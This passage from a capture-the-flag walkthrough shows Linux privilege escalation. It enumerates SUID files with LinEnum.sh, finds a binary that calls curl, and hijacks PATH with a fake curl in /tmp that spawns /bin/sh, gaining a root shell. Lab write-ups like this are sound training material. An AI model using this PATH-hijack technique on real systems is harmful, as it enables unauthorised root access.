After that, chmod +x LinEnum.sh to make it executable. Type ./LinEnum.sh to run the script

PATH variable exploit

As we can see at the SUID files for the enumeration by LinEnum.sh , we can see that /opt/statuscheck is very suspicious.

After running it, we can see that this content is generated by curl. then we use strings command to show what's inside the binary file

As we can see here we have a curl command here, if we run curl -I http://localhost, we will get something familiar

We then can modify the content inside of curl and use PATH variable to make the exploit working

We first head to /tmp folder.

Then type

echo "/bin/sh" >> curl

Then we can chmod 777 curl

then add the path by typing

export PATH=/tmp:$PATH

Then we can run /opt/statuscheck

We got the root !

Navigate to /root to get the flag

Congratulation!